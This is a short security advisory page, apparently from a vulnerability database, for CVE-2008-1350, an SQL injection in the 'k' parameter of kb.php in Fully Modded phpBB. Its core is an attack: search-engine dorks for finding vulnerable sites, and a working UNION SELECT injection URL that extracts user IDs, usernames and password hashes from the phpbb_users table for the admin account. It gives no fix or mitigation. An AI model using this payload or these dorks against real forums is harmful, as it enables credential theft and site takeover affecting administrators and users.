|
|
| Details : SecurityAlert |
|
|
Topic : | Fully Modded phpBB "k" (SQL)
|
SecurityAlert : 3745
CVE : CVE-2008-1350
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Exploit Given : Yes
Credit : TurkishWarriorr
Published : 17.03.2008
Affected Software : | Fully Modded phpBB "k" |
 Advisory Text : # Powered by phpBB © 2001, 2006 phpBB Group
# Modified by Fully Modded phpBB © 2002, 2006
#
########################################################################
#
#
# AUTHOR : TurkishWarriorr
#
# HOME : http://www.1923turk.org
#
########################################################################
#
#
# DORKS 1 : allinurl :kb.php?mode=article&k
# DORKS 2 : article&k=
# DORKS 3 : "Powered by phpBB © 2001, 2006 phpBB Group" "Modified by
Fully Modded phpBB © 2002, 2006"
#
########################################################################
##
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),userna
me,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+wher
e+user_id+=2&page_num=2&cat=1
########################################################################
##
www.1923turk.org
turkish-warriorr (at) hotmail (dot) com [email concealed]
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|